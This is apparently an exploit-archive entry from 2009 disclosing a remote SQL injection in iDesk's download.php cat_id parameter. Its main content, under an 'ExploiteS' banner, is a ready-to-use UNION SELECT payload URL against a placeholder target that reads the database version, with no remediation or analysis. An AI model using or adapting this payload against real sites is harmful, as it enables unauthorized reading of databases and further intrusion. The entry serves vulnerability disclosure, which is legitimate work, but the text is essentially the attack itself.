id: 5750
date: 09/09/2009
title: iDesk (download.php cat_id) Remote SQL Injection Vulnerability
author: Mr.SQL
cves: 

==============================================================
iDesk (download.php cat_id) Remote SQL Injection Vulnerability
==============================================================


###############################################################
###############################################################
##
## Remote SQL Injection Vulnerability ( download.php cat_id )
##
## iDesk
##
## http://www.nicecoder.com
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/download.php?cat_id=-1+UNION+SELECT+0,0,0,@@VERSION,0,0,0,0,0--
##
########################
########################



#  0day.today [2023-03-25]  #